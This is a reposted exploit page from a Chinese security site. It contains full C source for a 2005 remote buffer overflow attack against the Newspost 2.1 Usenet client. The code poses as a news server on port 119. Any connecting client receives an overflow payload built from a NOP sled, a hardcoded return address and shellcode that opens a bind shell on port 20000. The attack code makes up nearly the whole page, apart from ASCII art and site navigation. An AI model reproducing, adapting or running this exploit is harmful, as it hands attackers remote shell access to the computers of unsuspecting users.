首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Newspost 'socket_getline()' Remote Buffer Overflow Exploit
来源:www.gmx.net 作者:cybertronic 发布时间:2005-02-04  

Newspost "socket_getline()" Remote Buffer Overflow Exploit

Related Advisory - KOTIK/ADV-2005-0092

/*
02/03/2005
NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit

Client Usage
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic
<file>

Greetz fly to my girlfriend YASMIN H.


? 糓
M 糓MM
MMm 糓MMM
M$$MMm 糓MMMM.
MM$$MMMMm MMMMMMMM
`MM$$MMMMMMm 4MMMM$$MM
MMM$$MMMMMMMMm 碝MMM$$MMM
MMM$$$MMMMMMMMm mMMMM$MMMM
`MMM$$$MMMMMMMm MMMM$MMMM? MMMM$$$MMMMMMMm MMM$$MMM? `MMMMMMMMMMMMMm MMMMMMM? `MMMMMMMMMMMMMm MMMMMM
`MMMMMMMMMMMM MMMMM
`MMMMMMMMMM MMMMM
`MMMMMMMMMMMM
MMMMMMMMMMM
mmMMMMMMMMMMMMMMMMM
mmMMMMMMMMMMMMMMMMMMMMMM
糓MM#MMMMMMMMMMMMMMMMMMMMm
4MMM<?>MMMMMMMMMMMMMMMMMMMM
MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMM
糓n 糓MMMMMMMMMMMMMMMMMMMMMMMM 糓nn
nM `MMMMMMMMMMMMMMMMMMMMMM? n? `? MMMMMMMMMMMMMMMMM? n? MMMMMM? mtr?

mMMM nmM mM
mM即 M ' M n
mM$ nM n糓Mn寄
4M m 糓 N ? 糮
m? `n? mM NM? NM
mM mMm nm M醇M募 n糓m 糿 xn? ? 糿 xn? 糓m Mn n? nM
nMm
mM `mMM? nM M nM ,` 糿? y M 糿? y nM ? nM ? ? ? M? M' 寄 M n.,? nm nM nM n M ? ? ? n
MM? mM M nM ? M? n , nM 寄 nM M nM M M M? M
n
MMM? M? nM M哪M n糿N 糓 nM 糓 `糓? 醇 .N nM 糿M? M? n? cybertronic 2oo5
? ________________
----------------------/

MMMMMMMMm mMMMMMMM? 碝M$MMMMMMMMMm mMMMMMMMMM$MM`
MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM
`MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM?
赫湍 just want to say love you dad! 耐蘸

*/

#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>

#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"

#define PORT 119
#define BACKLOG 5

//92 bytes bindcode port 20000
char scode[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h

void cmd ( int connfd );
void header ();

int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;

header ();
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );

bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof ( servaddr )
);
printf ( "[*] Listening..." );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );

for ( ; ; )
{
clilen = sizeof ( cliaddr );

if ( ( connfd = accept ( listenfd, ( struct sockaddr * ) &cliaddr,
&clilen ) ) < 0 )
{
close ( listenfd );
exit ( 1 );
}

if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
printf ( "[*]" GREEN " Incomming connection from:\t %s\n" NORMAL,
inet_ntoa ( cliaddr.sin_addr ) );
cmd ( connfd );
}
close ( connfd );
}
}

void
cmd ( int s )
{
char in[1024], out[1200];
unsigned long ret = 0xbfffecb8;

bzero ( &out, 1200 );
memset ( out, 0x90, 956 ); //956
memcpy ( out + 956, scode, sizeof ( scode ) );
strcat ( out, "\x41\x41\x41\x41" );
strncat ( out, ( unsigned char* ) &ret, 4 );
printf ( "[*] Sending Bad Packet [ %u bytes ]...", strlen ( out ) );
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
sleep ( 1 );
}

void
header ()
{
system ( "clear" );
printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED "###
" GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# "
YELLOW "###\n" NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "# #
" GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED "###
" GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "# #
" GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# "
YELLOW "# \n" NORMAL);
printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "# #
" GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# "
YELLOW "###\n" NORMAL);
printf ( RED " cybertronic@gmx.net\n" NORMAL );
printf ( RED " ----------(c) 2005----------\n\n"
NORMAL );
printf ( "newspost-2.1\n\n" );
}



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux ncpfs Local Exploit
·ngIRCd 'Log_Resolver()' Remote
·Xpand Rally <= 1.0.0.0 serv
·Setuid perl 'PerlIO_Debug()' A
·HKLM CurrentVersion Locking
·Setuid perl 'PerlIO_Debug()' L
·Gpsd remote format string expl
·Mac OS X 'Finder/DS_Store' Arb
·Golden FTP Server v2.02b Remot
·3CServer v1.1 FTP Server Remot
·Siteman <= 1.1.10 Remote Ad
·AppleFileServer (AFS) 'FPLogin
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved